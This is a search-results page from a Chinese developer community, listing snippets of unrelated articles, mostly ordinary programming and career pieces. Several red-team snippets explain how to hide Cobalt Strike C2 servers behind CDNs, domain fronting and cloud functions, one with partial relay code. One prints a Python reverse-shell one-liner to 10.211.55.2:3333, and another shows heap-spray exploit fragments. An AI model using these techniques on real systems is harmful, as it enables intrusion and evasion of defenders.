- 综合排序
- 最热优先
- 最新优先
- 来自专栏女程序员的日常
腾讯面试经验2
例如:第一个数组有{1,2,3},第二个数组有{2,3,5},则合并后为{1,2,3,5}。 面试官提示我本道题是在64位系统下实现,而我需要的空间大小为元素取值的范围,也就是说最多能达到2^64远大于1Gb,所以这个方法是不可行的。 ? (2)我知道我一直没有利用到“有序”这个关键词,所以我抓紧这关键词,首先想到的是二分查找:以两个数组A、B合并为例,以A数组为基准,遍历B数组的元素,利用二分查找,将B的元素在A中找到最适合的位置, 若 他还是很耐心的跟我讲了一些对应届本科生的建议,最后说我阅历太少,经验不够,基础功不扎实。我回应了几句,并向他表示了真心的感谢之后离开了房间。 面试官的评价很到位,赤裸裸的现实,还是回校补补营养吧! 不过这份经历还是值的,一个毫无经验的应届本科生同几个研究生来竞争同样的职位,虽然结果很明显,但还是非常感谢面试官给我这个面试机会,而且整个面试过程中还那么耐心的引导我!
3.4K10发布于 2017-12-25 - 来自专栏红蓝对抗
流量加密之C2隐藏
所以我们需要加密流量保护CS服务器以免被防守方的安全监控检测出来甚至溯源我们的CS服务器,目前常用的隐藏手段包括域前置、CDN、云函数等,接下来我将介绍这几种常见的隐藏C2的方式。 因此我们可以通过云函数的特性来隐藏CS服务端。 CS 服务器定制 malleable C2 以用于隐藏流量。 可以发现我们的CS上又出现一台主机在微步云沙箱中可以清晰地看到请求域名为腾讯云域名同时IP地址为腾讯云的IDC服务器,而不是我们真正的CS服务器IP地址,说明CS服务器已成功隐藏。 ,就像CDN在设计之初主要用于保护网站的真实IP,但作为攻击者我们也可以使用它来保护我们的C2服务器;而使用OpenSSL生成的RSA证书除了身份验证以外也能够帮助攻击者加密流量、隐藏通信。
13.6K111编辑于 2022-06-21 - 来自专栏Khan安全团队
云函数隐藏C2爬坑记
启动云函数 * 在腾讯云控制台搜索云函数,在函数服务->函数管理进行新建->自定义 image.png // **坑点一:**要根据cs监听类型http/https在脚本内填入c2服务器地址 ``` py3代码 # -*- coding: utf8 -*- import json,requests,base64 def main_handler(event, context): C2='http ://<C2服务器地址>' # 这里可以使用 HTTP、HTTPS~下角标~ path=event['path'] headers=event['headers'] print(event) if * 这儿没做cs马的免杀,关了defender(被干的太惨了),选择https的监听方式,直接上线,sleep调到0发现监听ip会一直变动,配置生效 image.png ## * 总结 * 云函数隐藏 C2原理 马 -> 腾讯云函数api -> py函数 -> CS服务端 CS马被执行后,流量直接走向腾讯云的api(也就是这一步达成了隐藏C2服务端的目的,腾讯地址,有腾讯的CDN),然后py函数会根据传入的流量作为中间人对
2.7K30编辑于 2022-01-05 - 来自专栏C语言
C语言理论题经验分享2
C语言理论题经验分享2 本文是接上一篇博文的^^: 理论题经验分享1 文章目录 C语言理论题经验分享2 1.关于switch 2.关于sizeof() 3.算数中的数据类型转换 4.文件输入\输出 只能是常整数(整数表达式或枚举常量),不能是变量 2.关于sizeof() 1)sizeof(str)会返回字符串长度+1(‘\0’) 2)sizeof(++a); 只进行sizeof操作,只看类型,不对 2)short型转换为int型(同属于整型) 。 3)float型数据在运算时一律转换为双精度(double)型,以提高运算精度(同属于实型) 。 4.文件输入\输出(IO) 关于文件的输入输出写在了这篇文章里面: IO操作 5.关于if()中的条件 1)If(expr1 && expr2)中,当第一个条件不符合时不会再验证第二个 2)当if语句中的条件为赋值语句时 ,实际上是将赋值后的结果与0进行比较【左值】 if(1) 由于1>0 所以认为是true 6.关于结构体 1)结构体成员不能是函数 2)如果在某个函数中声明,只能在这个函数中用它来定义变量。
47110发布于 2021-02-22 - 来自专栏技术杂记
如何隐藏钩子:rootkit 的管理程序2
2. 两种分配的内存地址都是高度可预测的。 别的 intArr[i] = 0x3c3c3c3c;// 否则,ptr1 } // part2: ptr2 读取 别的 intArr[i] = 0x00badd1e; // ptr3 -> 外壳代码 } 碰撞(); } 脚本中的数值是根据经验选择完整的 页面大小的图案就足够了 因为我们只想泄漏大约 2 个字节的堆栈地址。 2.接下来,我们根据喷射循环计数器计算所有模式值 如下: i_pattern = i*4%0x1000; 3. 11b3dfe4 04e04c2c ; 看起来不错: 0:007> dds 04e04c2c 04e04c2c 6f6e44b8 msxml6!
5K480编辑于 2022-03-21 C#tablecontrol隐藏标题2种方法
ItemSize : Width=0;Height=1;//Height好象不能设为0,但也就那么一丁点儿,不影响
19710编辑于 2025-07-18- 来自专栏狼组安全团队
低成本隐藏加速你的C2
果然没错,根据HOST头进行定位,那么这样就可以按照CDN上线的方式进行配置监听: 生成一下CS马子并且执行: 执行一下命令: 在微步中看看分析: 看看转发的监听: 完美隐藏 当然你甚至还可以把C2管理端口使用不同工具映射出来。。。。 开源地址:https://github.com/SpringHgui/FastTunnel 后记 后面大家可以尝试一些新的东西,比如我自己想到: 利用 proxychains4 对你出口的流量进行隐藏
1.4K10发布于 2021-03-01 - 来自专栏Ms08067安全实验室
手把手教你如何隐藏C2
文章来源|MS08067 公众号读者投稿 本文作者:下次一定(白嫖知识星球活动) CDN技术隐藏C2 原理 让cdn转发合法的http或者https流量来达到隐藏的目的。 技术实现重点: 一个不备案的域名,否则这个方式毫无用处 这种技术对http与https没有强制要求,都可以使用,而域前置技术要求是https 域前置技术隐藏C2 原理 域前置技术就是通过CDN节点将流量转发到真实的 可达到的效果:通过一个高信任域名隐藏自己的真实域名与ip,且受害主机上的流量只有跟cdn通信的,不会有跟真实c2的。 技术实现重点 需要基于https 需要知道cdn上的其他高信誉域名或者ip 需要修改malleable profile文件 重定向技术隐藏C2 原理 总的来说就是得有两台vps,一台做重定向,一台是真正的 从技术上来说: cdn技术仅仅利用了cdn对http与https流量进行转发来达到的隐匿效果,可以隐藏ip不能隐藏域名。
2.7K20发布于 2021-06-16 - 来自专栏韩曙亮的移动开发专栏
【CSS】元素显示与隐藏 ( display 隐藏对象 | visibility 隐藏对象 | overflow 隐藏对象 )
一、元素的显示与隐藏 ---- 在开发中 , 经常需要使用到 元素的显示 与 隐藏 , 默认状态下 , 按钮下面没有任何内容 ; 将鼠标移动到 红色按钮 后 , 显示一个对话框布局 ; 控制 元素的 显示 与 隐藏 的样式有如下三种 : display visibility overflow 二、display 隐藏对象 ---- 1、display 隐藏对象语法说明 为标签元素设置 display: none 可以 隐藏该元素 ; 如果想要 显示该对象 , 为该元素设置 display: block 即可 ; 2、display 显示元素代码示例 设置 display: block , 子元素也同时不可见 ; visibility 设置属性值 visible , 表示该元素是可见的 ; visibility 设置属性值 hidden , 表示该元素是隐藏的 ; 2、visibility ---- 1、overflow 隐藏对象语法说明 overflow 只能对超出部分隐藏代码 ; overflow 可设置的值 : visible : 子元素超出父容器的部分仍然显示 ; hidden
8.7K30编辑于 2023-04-16 - 来自专栏趣谈前端
2年vue项目实战经验汇总
的项目经验我觉得是最好的成长,也希望给今年想接触vue框架或者想从事vue工作的朋友带来一些经验和思考。 你将收获 vue框架使用注意事项和最佳经验 vue项目配置经验总结 vue组件设计经验总结 vue项目架构与服务化探索 正文 本文不仅仅是总结一些vue使用踩过的一些坑和项目经验,更多的是使用框架(vue v-html 在dom内插入html内容 v-for 循环 v-text 渲染指定dom的内容文本 v-cloak 和CSS规则如 [v-cloak] { display: none } 一起用,可以隐藏未编译的 ', done: true }, { id: 2, text: '... 2. vue项目配置经验总结 在讲完vue项目经验之后,为了让大家能独立负责一个项目,我们还需要知道从0开始搭建项目的步骤,以及通过项目实际情况,自己配置一个符合的项目框架,比如有些公司会采用vue+element
2K31发布于 2020-02-19 - 来自专栏HACK学习
实战填坑 | CS使用CDN隐藏C2
但在搭建域名+CDN隐藏版c2时楼主遇到了不少的坑,在这里顺着搭建的思路慢慢把踩的坑填上。 2.服务器特征配置 2.1隐藏服务器:CDN加速 在cloudflarr注册域名后,将NS记录指向alice.ns.cloudflare.com和chase.ns.cloudflare.com即可选择使用 2.2隐藏流量特征:profile Malleable C2 profile作为CS的配置文件,可以配置通信流量的特征,用来隐藏自己的行踪,以Malleable-C2-Profiles为例: https ://github.com/rsmudge/Malleable-C2-Profiles 官方参考地址: https://www.cobaltstrike.com/help-malleable-c2 填坑 使用cloudflare隐藏c2还要设置profile中的head的mime-type,具体为:需要在http-config将头设置为header "Content-Type" "application
5.6K20发布于 2021-06-24 - 来自专栏Hermes Agent 爱马仕
🔥🔥🔥🦞 WorkBuddy 隐藏技能与老司机经验:别人不会告诉你的 10 个高阶玩法
WorkBuddy隐藏技能与老司机经验:别人不会告诉你的10个高阶玩法WorkBuddy上线两个月,很多人装完就扔在桌面吃灰。不是它不好用,是你不会用。 本文整理了官方文档里没有、但用过一个月以上才会发现的10个隐藏技能和实战经验。从解锁开发者模式到多Agent并行,从隐式定时任务到远程微信控制,每一个技巧都经过真实场景验证,复制指令就能用。 _dev或_beta后缀的技能ID,例如web_crawl_v2_beta。 强制启用隐藏技能展开代码语言:BashAI代码解释codebuddy-cliskillsenableweb_crawl_v2_beta--force启用后即可在任意IM工具中直接使用该技能名称作为指令前缀 经验:先用2-3个样本测试,确认效果后再全量执行每一步都让AI输出执行状态,便于追溯数据源一定要干净。有的邮件标题写简称,有的不写公司名,AI当然搜不到。
1.7K01编辑于 2026-04-21 - 来自专栏open claw 养龙虾专区
🔥🔥🔥🦞 QClaw 隐藏技能与老司机经验:别人不会告诉你的 10 个高阶玩法
QClaw隐藏技能与老司机经验:别人不会告诉你的10个高阶玩法有人说,QClaw不就是能微信遥控电脑吗?有什么好学的?如果你也这么想,那你可能已经错过了它90%的潜力。 操作步骤:打开Windows资源管理器,地址栏输入%APPDATA%\QClaw\shadow,进入隐藏快照目录找到以日期+哈希命名的子文件夹(如20260311_8a3f2d),其中action.json 经验总结:Skill安装后默认处于激活状态,会持续消耗资源定期检查“技能管理”,禁用超过30天未使用的Skill只保留高频使用、必须运行的Skill,其他的按需启用第三部分:QClawV2大版本——隐藏的新能力 老司机排障经验一位用户遇到电脑发烫、风扇狂转的问题,排查后发现两个原因:休眠阻止未关闭:QClaw默认开启了“防止休眠”,电脑持续满负荷运行。 有人把20多个Skill关到只剩2个,电脑立刻恢复正常。坑2:休眠阻止开启,电脑永不休眠原因:QClaw默认开启了“防止休眠”,即使不用也会让电脑持续满负荷运行。
79000编辑于 2026-04-21 - 来自专栏吟风者
swagger2自定义隐藏实体类属性
假如接收参数的实体类中关联了其他对象,那么swagger2的页面中参数应该会多出来这些,dept.id,dept.deptName,或者集合属性,roles[0].id,roles[0].roleName image 笔者在swagger2提供的配置中没有找到隐藏此类参数的设置 但是通过阅读源码找到了展开参数的类springfox.documentation.spring.web.readers.parameter.ModelAttributeParameterExpander ,笔者通过继承这个类,并添加@Primary注解覆盖了源码中的逻辑,修改了getBeanPropertyNames方法,其他不变 swagger2版本2.8.0 解决方案 package com.example.swagger ApiModelProperty(value = "角色信息") @IgnoreSwaggerParameter private List<Role> roles; } 这样就可以自定义隐藏 swagger2页面中的参数了。
9.5K40发布于 2019-07-25 - 来自专栏Ms08067安全实验室
远控免杀专题文章(2)-msfvenom隐藏的参数
(2)使用-p指定使用的攻击载荷模块,使用-e指定使用x86/shikata_ga_nai编码器,使用-f选项告诉MSF编码器输出格式为exe,-o选项指定输出的文件名为payload.exe,保存在根目录下 subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.2",3333));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
2.3K10发布于 2020-02-19 - 来自专栏HACK学习
实战填坑 | 隐藏C2域名地址技巧
哈,恭喜你你肯定被盯上了~ 开个玩笑,话说现在隐藏c2真实地址的手段层出不穷,笔者参考了网上众多隐藏技巧,经过一定的钻研写下了这篇主要隐藏域名的几个思路,但和域前置、云函数技术不同,域前置技术原理: 假设有两个主机 三、匿名CDN & worker 有老哥问了,要是多个c2,还有域名、c2的ip在国内使用,怎么办? 然后重点来了,我的目的并不是把cmd.winupdateck.top作为c2 handler,参考上个思路,新建worker,把cmd.winupdateck.top再隐藏在worker之后: let 未满足我的过滤条件,访问默认nginx为正常页面,设置我的过滤规则后,例如UA、Host,在c2中可看到访问信息: ? 2heroku有用户协议,如果不慎会被封号。 优点:地址黑了可以直接删了app重建一个。 五、总结 以上几个思路其实结合起来并不难,无非就是域名身后单纯CDN可隐藏ip,域名黑了再申一个。
7.8K10发布于 2021-06-24 - 来自专栏JAVA高级架构
2年Java开发工作经验面试总结
分析:一年多经验我认为是比较尴尬的,处于一个不上不下的位置,很多公司比较喜欢招三年经验的,或者直接招应届生来培养。 2.毕业于一个非985/211,勉强上一本的高校。 3.前一家公司是传统电信行业,加入项目组时,项目已经上线有段时间了,我们的任务就是有需求就开发,有bug就优化,其他时间就聊骚,各干各的,工作一年多跟在养老一样,用一句话说就是编程5分钟,扯淡2小时,项目经验严重不足 2.是否该海投? 投简历分为两个情况。 1)没有社招面试经验:建议采取海投的方式,只要职位要求跟自己比较匹配都可以投,累计面试经验。这个环节可以把投简历的网站增加两家:智联和无忧。 2)自认为社招面试经验已经足够:投那些职位匹配、公司满意的职位。公司评价可以去看准网、百度、知乎等查询。 3.一天约几家面试合适? 最理想的情况为2家面试,上午一般在10点左右,下午一般在2点左右。 一些经验: 1.先投一些普通公司,等面出了心得再去投理想的公司。 2.不熟悉的技术不要主动提。 3.对于那种实习期6个月还打8折的公司,除非你没有其他选择了,否则不要去。
2K100发布于 2018-04-19 - 来自专栏微信公众号:Java团长
2年Java开发工作经验面试总结
分析:一年多经验我认为是比较尴尬的,处于一个不上不下的位置,很多公司比较喜欢招三年经验的,或者直接招应届生来培养。 2.毕业于一个非985/211,勉强上一本的高校。 3.前一家公司是传统电信行业,加入项目组时,项目已经上线有段时间了,我们的任务就是有需求就开发,有bug就优化,其他时间就聊骚,各干各的,工作一年多跟在养老一样,用一句话说就是编程5分钟,扯淡2小时,项目经验严重不足 2.是否该海投? 投简历分为两个情况。 1)没有社招面试经验:建议采取海投的方式,只要职位要求跟自己比较匹配都可以投,累计面试经验。这个环节可以把投简历的网站增加两家:智联和无忧。 2)自认为社招面试经验已经足够:投那些职位匹配、公司满意的职位。公司评价可以去看准网、百度、知乎等查询。 3.一天约几家面试合适? 最理想的情况为2家面试,上午一般在10点左右,下午一般在2点左右。 一些经验: 1.先投一些普通公司,等面出了心得再去投理想的公司。 2.不熟悉的技术不要主动提。 3.对于那种实习期6个月还打8折的公司,除非你没有其他选择了,否则不要去。
95421发布于 2018-08-06 - 来自专栏Android理论
APK的更新、安装、隐藏、解除隐藏
android.intent.action.PACKAGE_REPLACED 且 intent.getBooleanExtra(Intent.EXTRA_REPLACING, false) 获取的值为true Android 监听多用户切换,隐藏和禁用指定 hideOtherBrandAppWhenUserSwitched(); } }); } } }; mContext.registerReceiver(mUserSwitchedReceiver, filter); 是否隐藏和禁用 exeption) { Slog.w(TAG, "enableApplication error:" + exeption.getMessage()); } } 隐藏的 // disable应用时,若传入此参数,则应用在桌面没有图标,且在设置界面、应用程序列表里面也没有图标 (应用完全隐藏了) public static final int COMPONENT_ENABLED_STATE_DISABLED_USER = 3; // disable应用时,若传入此参数,则应用在桌面没有图标,但是在设置界面、应用程序列表里面有图标 (只是桌面图标隐藏了,设置里面仍可以看到图标,用户可以再次enable此应用) 另外
3.6K50编辑于 2021-12-13 - 来自专栏小狐狸说事
7b2美化-隐藏页眉菜单美化社交类型菜单
7b2美化-隐藏页眉菜单美化社交类型菜单 ---- 示例请查看b2演示站 1、设置顶部菜单样式 设置项在:B2主题设置 – 模块管理 – 顶部 – 顶部布局样式-社交类型菜单 注意;如果你选择的是其他样式的菜单 2、添加css样式 请将以下css代码复制到你自己的css中。 .site .site-header-in{ box-shadow: none; } .site .site-header-in > div:last-child{ box-shadow: 0px 2px
1.2K40编辑于 2022-11-16
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号